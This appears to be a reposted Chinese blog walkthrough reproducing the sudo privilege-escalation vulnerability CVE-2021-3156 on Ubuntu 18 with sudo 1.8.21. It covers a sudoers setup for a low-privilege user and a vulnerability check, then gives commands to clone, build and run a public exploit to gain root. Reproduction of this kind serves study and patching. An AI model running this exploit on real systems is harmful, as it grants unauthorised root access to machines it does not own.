CVE-2021-3156 sudo提權漏洞復現

本文轉載自查看原文 2021-04-11 16:36 1020 漏洞復現

sudo官方在一月份的時候已經將漏洞修復，因此后面更新安裝的sudo已經補上這個漏洞

Ubuntu18 + sudo 1.8.21

低權限用戶test

vim /etc/sudoers

test ALL=(root) NOPASSWD:/usr/sbin/useradd,/usr/sbin/usermod

報錯開頭以sudoedit則存在漏洞，報錯以usage開頭，則不受影響

下載exp並執行

git clone https://github.com/blasty/CVE-2021-3156.git
make
./sudo-hax-me-a-sandwich 0

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 CVE-2021-3156 漏洞復現附帶提權exp 【CVE-2021-3156】linux sudo提權漏洞復現及修復 CVE-2021-3156 Linux提權漏洞實現 Linux sudo權限提升漏洞（CVE-2021-3156）復現 [權限提升] CVE-2021-3156 Linux sudo 漏洞復現關於sudo漏洞CVE-2021-3156 CVE-2021-3156漏洞復現 CVE-2021-3156漏洞復現 CVE-2021-3156 sudo權限提升漏洞 CVE-2021-3156：Sudo 堆緩沖區溢出漏洞復現過程